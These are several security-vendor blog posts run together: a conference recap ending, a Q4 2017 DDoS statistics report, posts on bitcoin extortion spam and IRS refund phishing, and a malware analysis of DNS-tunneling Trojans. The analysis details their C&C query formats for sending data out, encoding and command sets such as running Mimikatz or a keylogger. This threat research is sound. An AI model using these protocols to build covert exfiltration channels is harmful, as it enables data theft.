Then it was the turn for Dmitry Bestuzhev, Director of Kaspersky Lab’s Global Research and Analysis Team in Latin America, who gave an astonishing presentation titled “Moving like a Spook through Walls Or how to be only a shadow for APT detectors”. It’s always interesting to observe how the community sees the Latin American threat landscape, which sometimes would seem as it’s not getting the attention it deserves. There wasn’t enough room in the auditorium to fit all the people interested in the talk, however since coffee and pastries were waiting for us after the presentation, the conversation could be continued with all of those that were eager to keep the debate open.

From https://twitter.com/pentest_it/status/954789778528096256

The biggest surprise for me was the addition of an entrepreneur track, something that undoubtedly every attendee was thankful for. Sometimes we are guilty of getting lost in the technical side of things, forgetting about the business and how to actually make our idea reach the audience we want it to. There were presentations from different startups, and remarkable information on how to grow your business, monetize it, and ultimately how not to lose sight of your original concept or idea even when dealing with venture capitals and external pressures.

It’s one of those events that you can’t miss, whether it’s playing the custom capture the flag game with your team, building weird antennas in the hacking village, or participating in any of the tracks, you’ll find something in BSides NYC for you. Oh, and don’t forget, there’s always conference swag!

DDoS attacks in Q4 2017

6 Únor, 2018 - 10:01

News overview

In terms of news about DDoS attacks, the last quarter of 2017 was livelier than the previous one. Some major botnets were discovered and destroyed. For instance, early December saw the FBI, Microsoft, and Europol team up to knock out the Andromeda botnet, in operation since 2011. In late October, the Indian Computer Emergency Response Team (CERT) issued a warning about a massive botnet being assembled by a hacker group using the Reaper and IoTroop malware; earlier that same month, the spread of Sockbot through infected Google Play apps was detected and terminated.

Besides the various battles with Trojan-infested botnets, the last three months of 2017 were dominated by three main DDoS trends: politically motivated attacks, attempts to cash in on the soaring price of Bitcoin, and tougher law enforcement.

Politically motivated DDoS attacks remain eye-catching, but fairly ineffective. In late October again, during parliamentary elections in the Czech Republic, the country’s statistical office was hit by a DDoS attack in the middle of the vote count. The attack was a nuisance, but nothing more, and the results of the elections were duly announced on time.

Another DDoS-based political protest was aimed at the Spanish government in connection with the Catalan question. Hacktivists from the Anonymous group managed to take down the website of Spain’s Constitutional Court, and defaced the Ministry of Public Works and Transport’s website with the message “Free Catalonia.”

But politics is politics, and business is, well, just that. As we noted in the previous quarter, Bitcoin and everything associated with it has hit peak commercial popularity — not surprising, considering the explosive growth in its value. No sooner had Bitcoin spawned a new kind of cryptocurrency in the shape of Bitcoin Gold (BTG) than BTG sites immediately came under DDoS fire. After the price of the cryptocurrency took off in November, DDoS attacks rained down on the Bitfinex exchange — apparently with the aim of profiting from Bitcoin price fluctuations caused by denial of service. Still punch-drunk from the November attack, Bitfinex was paralyzed by two more onslaughts in early December.

On the topic of total failure, it would be amiss not to mention the shutdown of four shadow markets in the deep web used for all kinds of illegal trade: Trade Route, Tochka, Wall Street Market, and Dream Market. They have been operating erratically ever since October. It wasn’t clear at first what was behind these massive, well-coordinated attacks: the law enforcement agencies (as in the recent destruction of AlphaBay and Hansa) or competitors attempting to encroach on their territory. The subsequent attacks on all other trading platforms in early December dispelled most analysts’ doubts that it was a full-scale cyberwar between drug cartels.

However, the law — in particular, the judicial system — is not sitting idly by. Q4 saw a whole host of charges and sentences handed down in DDoS-related cases. The US judicial system was the most active: in mid-December, three defendants, Paras Jha, Josiah White, and Dalton Norman, confessed to being the brains behind the Mirai botnet.

And in late December, the founders of the notorious hacker groups Lizard Squad and PoodleCorp — Zachary Buchta of the U.S. and Bradley Jan Willem van Rooy of the Netherlands — were convicted.

In Britain, the high-profile case of young hacker Alex Bessell from Liverpool went to trial. Bessell was recently jailed for having launched a series of major cyber attacks in the period 2011-2013 against such giants as Skype, Google, and Pokemon. An even younger British hacker who targeted NatWest Bank, the National Crime Agency, Vodafone, the BBC, and Amazon was handed 16 months’ detention, suspended for two years.

A curious incident concerned 46-year-old John Gammell of Minnesota, who was charged with hiring three hacking services to create problems for his former employers, the websites of the judicial system of the district where he lived, and several other companies where he was once a contractor. The sponsors of DDoS attacks are often hard to track down, but Gammel couldn’t resist the temptation to tease his targets with emails — which led to his capture. As the investigators reported, the hacking services dealt with Gammel very professionally and cordially, thanking him for procuring their services and even upgrading his membership.

Quarter trends

Q4 demonstrated that DDoS attacks can be categorized as persistent online “crosstalk.” Junk traffic has become so widespread that server failure from too many requests might not be attack-related, but the accidental result of botnet side activities. For instance, in December we logged a huge number of requests to non-existent 2nd and 3rd level domains, which created an abnormal load on DNS servers in the RU zone. A modification of the Lethic Trojan turned out to be the culprit. This long-known malware comes in many different flavors, its main task being to allow spam traffic to pass through infected devices, basically like a proxy server.

The version we discovered was unlike most modifications in that it operates in multiple threads to create a huge number of requests to non-existent domains. The study found that this behavior was an attempt to mask the command-and-control (C&C) server addresses behind numerous junk requests, and the excessive load on the DNS servers was simply the result of the malware’s poor design. Nevertheless, DDoS attacks on DNS servers using junk requests are quite common and easy to implement. Our experts have assisted clients in many such instances. What’s interesting here is the method employed, as well as the perhaps unintended effect.

Statistics for botnet-assisted DDoS attacks Methodology

Kaspersky Lab has extensive experience of combating cyber threats, including DDoS attacks of various complexity types and ranges. Company experts track the actions of botnets by using the DDoS Intelligence system.
Being part of the Kaspersky DDoS Prevention solution, the DDoS Intelligence system intercepts and analyzes commands sent to bots from C&C servers and requires neither the infection of any user devices, nor the actual execution of cybercriminals’ commands.

This report contains DDoS Intelligence statistics for Q4 2017.

In the context of this report, it is assumed that an incident is a separate (single) DDoS-attack if the interval between botnet activity periods does not exceed 24 hours. For example, if the same web resource was attacked by the same botnet with an interval of 24 hours or more, then this incident is considered as two attacks. Also, bot requests originating from different botnets but directed at one resource count as separate attacks.

The geographical locations of DDoS-attack victims and C&C servers used to send commands are determined by their respective IP addresses. The number of unique targets of DDoS attacks in this report is counted by the number of unique IP addresses in the quarterly statistics.

DDoS Intelligence statistics are limited only to those botnets detected and analyzed by Kaspersky Lab. It should also be noted that botnets are just one of the tools for performing DDoS attacks; thus, the data presented in this report do not cover every single DDoS attack that occurred during the specified period.

Quarter results
  • In Q4 2017, DDoS attacks were registered against targets in 84 countries (98 in Q3). However, as in the previous quarter, the overwhelming majority of attacks occurred in the top ten countries in the list (94.48% vs. 93.56%).
  • More than half of all attacks in Q4 (51.84%) were aimed at targets in China — almost unchanged since Q3 (51.56%).
  • In terms of both number of attacks and number of targets, South Korea, China, and the US remain out in front. But in terms of number of botnet C&C servers, Russia pulled alongside this trio: its relative share matched China’s.
  • The longest DDoS attack of Q4 2017 lasted 146 hours (just over six days). This is significantly shorter than the previous quarter’s record of 215 hours (almost nine days). 2017’s longest attack (277 hours) was registered in Q2.
  • The days before and after Black Friday and Cyber Monday saw increased activity on dummy Linux servers (honeypot traps), which lasted right up until the beginning of December.
  • SYN DDoS remains the most common attack method, while the least popular is ICMP DDoS. According to Kaspersky DDoS Protection data, the frequency of multi-method attacks rose.
  • In Q4 2017, the share of Linux botnets climbed slightly to 71.19% of all attacks.
Geography of attacks

In Q4 2017, DDoS attacks affected 84 countries, which represents a slight improvement over the previous quarter, when 98 countries were hit. Traditionally, China is most in the firing line, although the country’s share of attacks decreased slightly (from 63.30% to 59.18%), approaching the Q2 level. The figures for the US and South Korea, which retained second and third place, went up slightly to 16.00% and 10.21%, respectively.

Fourth place went to Britain (2.70%), which climbed 1.4% to overtake Russia. Although Russia’s share of attacks dropped insignificantly (by 0.3%), that was enough to push it into sixth place behind Vietnam (1.26%), which made a return to the leaderboard, squeezing Hong Kong out of the top ten.

Distribution of DDoS attacks by country, Q3 and Q4 2017

The percentage of attacks directed against targets in the top ten countries grew in the last quarter (but not by much) to almost 92.90% vs. 91.27% in Q3 2017. The landscape is much the same as before.

About half of all targets are still in China (51.84%), followed by the US (19.32%), where the number of targets is again nearing 20% after a slight dip in Q3; South Korea is third with 10.37%. Vietnam again ousted Hong Kong from the top ten, taking ninth place with a 1.13% share, while Russia (1.21%) came seventh with a loss of 1%, making way for Britain (3.93%), France (1.60%), Canada (1.24%), and the Netherlands (1.22%), whose figures did not change much against the previous quarter.

Distribution of unique DDoS-attack targets by country, Q3 and Q4 2017

Dynamics of the number of DDoS attacks

Statistical analysis of specially prepared Linux servers —  so-called honeypot traps — shows that peak botnet activity this quarter occurred during the pre- and post-holiday sales. Feverish cybercriminal activity was clearly observed around Black Friday and Cyber Monday, dying down by the second third of December.

The most significant peaks occurred on November 24 and 29, when the number of individual IPs storming our resources doubled. Some increase in activity was also observed in late October — most likely Halloween-related.

Such fluctuations point to attempts by cybercriminals to boost their botnets in the run-up to major sales. Pre-holiday periods are incubators of cybercriminal growth for two reasons: first, users are less discerning and more likely to “surrender” their devices to intruders; second, the prospect of a fast buck makes it possible to blackmail Internet companies with lost profits or to offer one’s services in the cut-throat struggle online.

Dynamics of the number of Linux-based attacks in Q4 in 2017*
*Shows changes in the number of unique IPs per 24 hours


Types and duration of DDoS attacks

In Q4, the share of SYN DDoS attacks decreased (from 60.43% to 55.63%) due to less activity by the Linux-based Xor DDoS botnet. These attacks still rank first, however. The percentage of ICMP attacks (3.37%), still the least common, also fell. The relative frequency of other types of attacks increased, but whereas in the previous quarter TCP attacks ranked second after SYN, UDP overshadowed both these types, rising from second-to-last to second-from-top (in Q4 UDP DDoS accounted for 15.24% of all attacks).

Distribution of DDoS attacks by type, Q4 2017

Kaspersky DDoS Protection annual statistics show a decline in the popularity of DDoS attacks involving only pure HTTP and HTTPS flooding. The frequency of multi-method attacks rose accordingly. Nevertheless, one in three mixed attacks contained an HTTP or HTTPS flood. This may be due to the fact that HTTP(S) attacks are quite expensive and complex, while in a mixed attack they can be used by cybercriminals to increase the overall effectiveness without additional costs.

Correlation between attack types according to Kaspersky DDoS Protection, 2016 and 2017

The longest attack in Q4 was significantly shorter than its Q3 counterpart: 146 hours (about 6 days) vs. 215 (about 9). That’s barely half the Q2 and 2017 record of 277 hours. Overall, the share of longish attacks continues to decline, albeit insignificantly. This also applies to attacks lasting 100-139 hours and 50-99 hours (the shares of these categories are so small that even a change of 0.01% is news). The most common are still micro-attacks, lasting no more than four hours: their share rose slightly to 76.76% (vs. 76.09% in Q3). Also up was the proportion of attacks lasting 10-49 hours, but again not by much — about 1.5%.

Distribution of DDoS attacks by duration (hours), Q3 and Q4 2017


C&C servers and botnet types

The top three countries by number of C&C servers remained as before: South Korea (46.63%), the US (17.26%), China (5.95%). Yet although the figures for the latter two climbed slightly against Q3, China had to share third place with Russia, which gained 2%, the reason being that despite the fact that the leaders’ share changed insignificantly percentage-wise, in absolute terms the number of C&C servers detected in all three countries almost halved. This is at least partially due to the termination of many Nitol botnet admin servers and the less active Xor botnet. On a separate note, this category’s top ten welcomed Canada, Turkey, and Lithuania (1.19% each), while Italy, Hong Kong, and Britain departed the list.

Distribution of botnet C&C servers by country, Q4 2017

The steady increase in the number of Linux-based botnets continued this quarter: their share now stands at 71.19% against Q3’s 69.62%. Accordingly, the share of Windows-based botnets fell from 30.38% to 28.81%.

Correlation between Windows- and Linux-based botnet attacks, Q4 2017



Q4 2017 represented something of a lull: both the number and duration of DDoS attacks were down against the previous quarter. The final three months of 2017 were even calmer than the first three. Alongside the rising number of multicomponent attacks involving various combinations of SYN, TCP Connect, HTTP flooding, and UDP flooding techniques, the emerging pattern suggests a backsliding for DDoS botnets in general. Perhaps the economic climate or tougher law enforcement has made it harder to maintain large botnets, causing their operators to switch tactics and start combining components from a range of botnets.

At the same time, the increase in the number of attacks on honeypot traps in the runup to holiday sales indicates that cybercriminals are keen to expand their botnets at the most opportune moment, looking to grab a slice of the pie by pressuring owners of online resources and preventing them from making a profit. In any event, the DDoS spikes around Black Friday and Cyber Monday were a salient feature of this quarter.

Another aspect of the late fall/early winter period was the continued attacks on cryptocurrency exchanges in line with the trends of the past months. Such fervor on the part of cybercriminals is not surprising given the explosive growth in the price of Bitcoin and Monero. Barring a collapse in the exchange rate (short-term fluctuations that only encourage speculators do not count), these exchanges are set to remain a prime target throughout 2018.

What’s more, the last quarter showed that not only are DDoS attacks a means to make financial or political gain, but can produce accidental side effects, as we saw last December with the junk traffic generated by the Lethic spam bot. Clearly, the Internet is now so saturated with digital noise that an arbitrary resource can be hit by botnet activity without being the target of the attack or representing any value whatsoever to the attackers.

Every little bitcoin helps

1 Únor, 2018 - 10:03

It often happens that inventions and technologies that start out good end up turning into dangerous tools in the hands of criminals. Blockchain is no exception to this rule, especially in its most common cryptocurrency incarnation. Cryptocurrencies crop up in all kinds of spam: from traditional advertising (courses about investment and trade) to more fraudulent and malicious varieties. Quite often, cryptocurrencies are used by attackers as originally intended — as a means of payment (albeit from victims). We found and delved into several spam mailings in which cybercrooks exploited user paranoia about information threats and took bitcoins as payment for peace of mind. The attacks targeted employees of small companies, but such emails could be sent to any user’s personal mail.

In the first email, the attacker claimed to have installed malware on a porn site visited by the victim, and to be in possession of several videos recorded from both the device screen and cameras; not only that, a keylogger had supposedly provided access to the user’s IM, email, and social media contacts. To get the attacker off their back, the victim was asked to transfer the equivalent of $320 to the bitcoin wallet specified in the email. It was also mentioned that a built-in tracking pixel would inform the attacker that the email had been seen. And if the recipient wanted proof of that, they should reply to the message, whereupon the compromising info would be sent out to five of their contacts. As a postscript, the scammer warned against going to the police: he allegedly lived in Belarus, so the investigation would drag on for years.

The next email was wordy but imaginative, written by a hacker by the name of Andrey. The attacker informed the recipient that he had studied the latter’s company, together with its employees and their relatives, found weaknesses, and was planning to ruin it. The author listed no fewer than seven ways to achieve this goal, from simply writing negative reviews on various websites to creating fake company reports in his garage(!) and sending them to government departments. However, the hacker’s preferred outcome was for the company to see sense and transfer 3 bitcoins to his wallet. Like the previous email, it specifically mentioned not going to the cops, since “Andrey” lived in Ukraine.

Another email was the work of not one hacker, but an entire chain gang. The attackers allegedly had hacked the company’s server and got hold of information about its clients, bank accounts, tax payments, etc. Now they were threatening to damage the company’s reputation by publishing this information online. It was also stated that at some unspecified moment they would launch an attack on the company’s servers and computers, encrypting all data. To call off the attack, the blackmailers demanded 0.5 bitcoin. If the cryptopayment was not made before the start of the attack, the amount would rise to 2 bitcoins.

Sadly and (perhaps) surprisingly, some people still fall for such concoctions. The targets of these mailings are usually small companies that lack the resources for decent anti-spam protection and basic information security training for staff. So let us reiterate: be vigilant, stay calm, and take anonymous threats of this kind with a pinch of salt.

Cybercriminals target early IRS 2018 refunds now

31 Leden, 2018 - 18:54

On Monday, Jan 29th, IRS officially opened its 2018 season. Some taxpayers already filed their taxes and cybercriminals know it too. So, right after two days of the official 2018 season opening, we got phishing messages with a fake refund status Websites:

The link in the email leads to a hacked Brazilian restaurant, redirecting to Website with Australian domain zone.

So, the whole scheme is to steal credit card information of the taxpayers expecting a tax refund from IRS. Both URLs are blocked by Kaspersky Anti-Phishing now.

The mentioned website was hacked and includes an old Webshell uploaded back to 2016. The server has directory listing enabled.

Should we expect more campaigns like this? Definitely yes. Stay watchful and don’t lose your refunds!

Denis and Co.

25 Leden, 2018 - 12:00

In April 2017, we published a detailed review of a malicious program that used DNS tunneling to communicate to its C&C. That study prompted us to develop a technology to detect similar threats, which allowed us to collect a multitude of malware samples using DNS tunneling.

In this article, we will examine some of the most notable malicious programs that use DNS tunneling. Kaspersky Lab’s security products detect them with generic (‘Trojan.Denes.UDP.C&C’ or ‘Backdoor.Win32.Denis.*’) or individual verdicts.


The first piece of malware we’ll look at has a multi-layer C&C communication protocol structure that is similar to the OSI model and sets it apart from all the other Trojans reviewed here. The creators of Trojan.Win32.Ismdoor.gen have obviously put a lot of effort into its design and development.

Of course, for its transport layer this Trojan uses a DNS tunnel. The length of outgoing ‘datagrams’ are limited to 60 characters, though DNS server configurations and the actual protocol permit this value to be larger. The C&C server’s commands are resolved into IPv6 addresses.

A typical query sent to the C&C server looks like this:

n.n.c.<Session ID >.<Server domain>.com

Structure of transport layer request and response

There is a session layer protocol in place above the DNS tunnel transport layer, which implies the ability to exchange ‘short’ and ‘long’ packets. It differs from the transport layer in that it has a mechanism to check for lost messages. While a transport layer session closes with the exchange of data on the number of packets sent and received, a session layer closes by checking that every sent packet has been received correctly. It is up to the server which option to use; for instance, the ‘long’ packet protocol is used for uploading files from an infected computer.

Example of short message exchange protocol

Short messages

At this level, the bot’s operation can be broken down into five steps:

  • Declare session ID to server;
  • Send a message in packets;
  • Send the number of packets sent;
  • Receive the number of incoming packets;
  • Receive incoming packets.

A session example:

  1. Declare session ID to server

Each time a communication session is opened the bot generates a GUID and sends it to the server. This GUID is then used to identify all communications within that session, and is always written in the third-level domain position. In this case, the URL has the following structure:

n.n.c.<Session ID>.<Server domain>.com

The message A67DDB8A2A17334765443253702AA3 is a positive response. Otherwise, the GUID is sent to the server again.

  1. Send a message in packets

As we said earlier, the selected communication mechanism imposes certain restrictions on packet sizes. An outgoing message is broken into packets 60 bytes long, and sent in the form of URLs:

<Outgoing packet>.<Packet number>.dr.<Session ID >. <Server domain>.com

The response must be A67DDB885A3432576548A2A3707334.

  1. Send the number of packets sent

When all packets have been sent successfully, their number is sent as a query in the following format:

n.<Number of packets>.f.<Session ID >.<Server domain>.com

It should be noted that the packet numbering starts with 0. The response is 20202020202020202020202020202020.

  1. Receive the number of incoming packets

This step is implemented with the following type of URL format:

n.n.fc.<Sessions ID >.<Server domain>.com

The response must be in the following format:

A67D: DB8: 85A3: 4325: 7654: 8A2A :: <Number of incoming packets>

  1. Receive incoming packets

The request to receive the next packet looks like this:

www. <Packet number>.s. <Session ID > .<Server domain>.com

The incoming messages come in the form of 16-byte IPv6 packets.

Long messages

In this case, communication with the server can be broken down into the following steps:

  • Send the number of packets which the file was divided into;
  • Send the file;
  • Send periodic queries to server to check for lost packets;
  • Resend lost packets.

The session ID comes from the query in which the file was requested.

  1. Send the number of packets

Query: n.<Number of packets>.<Session ID >.<Server domain >.com

Response: A67DDB8A2A17334765443253702AA3.

  1. Send the file in packets

Query: <Outgoing packet>.<Packet number >.d.<Session ID >.<Server domain >.com

Response: the server does not reply to this message, or sends a ‘Server failure’ response.

  1. Send periodic queries to server to check for lost packets

Over regular intervals, the bot sends the following query to the server:

uff<Number of packets>.< Number of packets >.<Server domain >.com

Response: 20202020202020202020202020202020

After that, the steps ‘Receive the number of incoming packets’ and ‘Receive incoming packets’ from the previous section are implemented.

In response, the numbers of packets – separated by commas – that the server has missed are sent.

  1. Resend lost packets

Query: <Outgoing packet>.<Packet number>.dl.<Session ID>.<Server domain>.com

The presentation layer in OSI is responsible for coding and decoding messages. The server response contained in an IPv4 address field is a regular ASCII string that is divisible by sixteen. The query to the server contained in a DNS query is coded in Base64 with a redefined index table.

Example of the first message and its representation in the ‘datagram’ body

The application layer is simply a set of GET-like queries to the C&C server:

  • Check connection. This query is the string ‘M:CC?’;
  • Register connection. This determines the available commands, and the IDs of the infected computer and the bot (M:AV?appId=<…>&uniqueId=<…>);
  • Registration confirmation command;
  • ‘Generic’ response (M:ME?appId=<…>&message=<…>);
  • Receive command (M:GAC?appId=8);
  • Confirm command (M:CR?cd=<Command GUID>);
  • Send file (M:SF?commandId=CmdResult=<Command GUID>|||<Result of command execution >);
  • Receive file (M:GF?).

As stated above, this Trojan is well designed and written, has a well-thought-out system of communication as well as a payload rich in capabilities. Below is a list of its main commands:

  • SI — send information about the infected system;
  • RunNewVersion — update;
  • Restart — restart;
  • remove — remove itself;
  • CreateMimi1Bat — execute Mimikatz;
  • ExecuteKL — activate keylogger;
  • RemoveKL — remove files created by ExecuteKL;
  • GetVersion — report the Trojan’s version;
  • PauseUpload —suspend uploading files to the server;
  • ResumeUpload — resume uploading files to the server;
  • PauseDownload —suspend downloading files from the server;
  • ResumeDownload — resume downloading files from the server;
  • PWS — take a screenshot;
  • DownloadFile — download a file from the server;
  • UploadFile — upload a file to the server.

The other commands available to the Trojan are responsible for the logic of its operation (such as changing the C&C address, etc.).


This next sample uses a different workflow based on ANY DNS packets. This mechanism allows the malicious program to receive DNS packets of a random structure from the server. With this Trojan, there is no logical breakdown into sub-protocols – there are just outgoing and incoming requests. We were able to detect several modifications of this Trojan. Below, we describe features and characteristics present in all of them.

One interesting peculiarity of Backdoor.Win32.ClIEcker is how it finds out the victim computer’s IP address – to do so it uses Internet Explorer’s COM interface. The Trojan contains a list of website addresses where the visitor can see their own IP address (such as http://www.ip-adress.com). The Trojan randomly selects one of these, visits that address, finds the string in the body of the page that is followed by the IP address, and extracts it. To disguise this query as much as possible, the Trojan will also select a random referral address and use it in the appropriate request to Internet Explorer.

The only thing that remains unclear is why such a complicated method is used; typically, Trojans find out a computer’s IP address by requesting data from sites that return a string containing the IP address as an HTML page. Perhaps it was done in an attempt to avoid resolving to an IP address that may be in the IoC list for this Trojan, or it might just have been a thoughtless cut-and-paste job from a code repository or forum.

To complicate things even further, the Trojan supports a command to open a website in Internet Explorer upon request from the server – for this, a trivial call in the form “IEXPLORE.EXE google.com” is used, rather than the complex COM interaction. Because of this, the Trojan could be detected as a Trojan-Clicker, though, as we explained in an earlier article, Trojan Clickers typically use a virtual desktop to do this.

Examples of URL addresses used for resolving IP/referral address and receiving page contents via COM

In the initiating request, several parameters describing the victim system are sent along with a unique RC4 key that’s created using the following info about the victim computer:

  • Major version of the operating system;
  • Logical flag indicating if a modem connection is used or not;
  • Trojan ID;
  • User’s encrypted IP address;
  • Antivirus service code.

Some explanation should be given for the last point. The Trojan contains a list of security software; each security product is coded by a bit in this code sent to the server. For example, all processes related to McAfee products will be denoted by the flag 0x400 in the antivirus service code.

Next, we will give a description for some of the commands:

Code Arguments Description 0 File name Execute the downloaded file. 1 URL Open the specified webpage in IE. 2,3 NULL These commands must receive the code for the executable file as an argument, save the file and run it. In the first case, the current version of the Trojan ceases running. For some reason, these commands are disabled. The Trojan ignores the rest of this list of commands and proceeds to request a new one. 5 Server query period in minutes There are two possible values for the server query period. One is used if the previous list of commands was executed in full. Otherwise, the other is used. This command sets the wait period for the first option. 6 NULL Stop running. 7 Wait period in minutes Pause for the specified period. 18 Modifier If the modifier is >= 0, then the next command on the list is executed. Otherwise, processing of the list terminates. 19 Server query period in minutes Sets the server query period in the event that processing of the list was interrupted. 21 NULL Sets flag for prompt reconnection. This allows the Trojan to query the server for a new list of commands immediately after it completes the previous list. 22 NULL Delete the downloaded file. 23 File name Set a new name for the downloaded file.

The command with code 8 deserves special attention, as it contains the Trojan’s main functions. Its job is to download and launch the payload. This command has the following arguments:

Name of argument Description File_Size Size of the downloaded file. SessionID Session ID. ServerKey Key for RC4 received from the server. GetFile_URL URL for file download. DNS_URL URL of the DNS server which will be used to create a DNS tunnel. GetPacketInterval Server query period for the next packet. KeyMod Flag for modifying the key. ReportURL URL of the server where successful file download will be reported. ExecMode File execution modifier. If it is larger than 2, the file will be neither saved nor executed. If it equals 2, the file will be saved and executed. Otherwise, the Trojan will attempt to inject the downloaded file into the IE process. Packet_Number Packet number.

The file is transferred in TXT DNS packets.

All communication with the server is, by default, encrypted with an RC4 key that is generated based on information about the victim computer. However, the server may request that the key be changed, and send a new key in a file download request. In any case, the key required for generating the S-box is encrypted with itself, and the resulting string is subsequently used. The S-box is modified according to the packet number, so it is unique for every new packet.

When decryption is completed, the integrity of the resulting file is checked with CRC32.


Backdoor.Win32.Denis has the simplest structure and the simplest DNS server communication functionality. This piece of malware has the same name as the Trojan described in this article, however, all similarities finish there.

This malicious program uses A DNS-format packets to communicate with the DNS server; in this format, the response size is limited to 4 bytes. All indicators point to this being a regular Trojan Downloader, and it is quite slow in downloading files. The typical format of a message sent to the server looks like this:

IC<Container type>.<UID>.<Container>.<Server address>

By ‘container’, we mean the results of the Trojan’s operation in a packed form. The structure of the container may vary significantly depending on the command and the response. UID is the user’s ID that is 0x20 bytes long. It is a Base32 string which, after decoding, has the following structure:

Offset Description 0x0 – 0xF Contains the user host name. 0x10 – 0x14 Contains the user IP address.

The container is also a Base32 string:

Offset Description 0x0 – 0x3 The time taken to create the message in seconds. 0x4 – 0xB ‘IACIMAOQ’ signature. 0xC – 0x22 Message.

A total of four types of containers exist. The Trojan determines which one is required, depending on the command it has received, and the results of executing it:

Type Purpose Message Description 1 Send information about the victim system. Information about the logical drives in the user’s system. The first byte indicates the amount of data sent. Pairs of bytes then follow: the letter of the logical drive and its type. The rest is filled with arbitrary characters. 2 Send information about the status of file receiving. Real file size, the current file size, counter of lost responses. If the transferred file does not exist yet, it is created and the container type is changed to 1. Otherwise, a message is sent in which the first 4 bytes contain the complete file size that was received in the message coded 0xC0. The next 4 bytes store the current file size. The next 4 bytes contain the counter of lost messages coming from the server. The rest is filled with arbitrary characters. 3 Send information about successful receipt of the file. No Prior to each network communication, the current file size is compared to real file size. If they match, then container type is changed to 4. 4 Send information about the successful execution of the command with code 0xCB. No NULL


Code Arguments Description 0x7F Stored in the 4th byte. Number of minutes. Pause for the specified number of minutes. Send container type 1. 0xC0 Stored in the last three bytes. The size of the transferred file. Receive the size of the transferred file. Send container type 2. 0xCB NULL Rename the current executable file to < APPDATA>\ IACIMAOQ. Send container type 4. 0xA The 2nd byte stores the number of the packet. The 3rd and 4th bytes are a pair of bytes of the transferred file. Receive part of file and write it. Send container type 1.

As can be seen from the description of commands, this Trojan’s purpose is to download and launch files.


15b36b1e3a41ad80bbd363aea8f2d704 — Trojan.Win32.Ismdoor.gen
1FD599FB9FA62EB91511002771D78104 — Backdoor.Win32.ClIEcker
1f3a2c48a7f5c2c31e71f552d74c3543 — Backdoor.Win32.Denis